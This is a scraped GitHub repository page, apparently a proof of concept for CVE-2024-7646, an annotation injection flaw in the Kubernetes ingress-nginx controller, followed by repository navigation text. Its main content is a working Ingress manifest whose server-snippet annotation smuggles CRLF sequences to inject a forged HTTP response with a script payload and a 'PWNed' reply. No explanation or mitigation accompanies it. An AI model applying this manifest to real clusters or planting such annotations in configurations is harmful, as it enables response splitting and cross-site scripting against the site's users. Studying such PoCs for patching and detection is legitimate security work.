CVE-2024-7646

PoC CVE-2024-7646

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: example-ingress
  annotations:
    nginx.ingress.kubernetes.io/server-snippet: |
      add_header X-Pwn-Header "Pwn\r\n
      HTTP/1.1 200 OK
      Content-Type: text/html
      <script>alert('XSS');</script>
      --------";
      return 200 "PWNed";
spec:
  rules:
    - http:
        paths:
          - pathType: Prefix
            path: /
            backend:
              service:
                name: test-service
                port:
                  number: 8080

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-7646

About

Releases

Packages

r0binak/CVE-2024-7646

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-7646

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages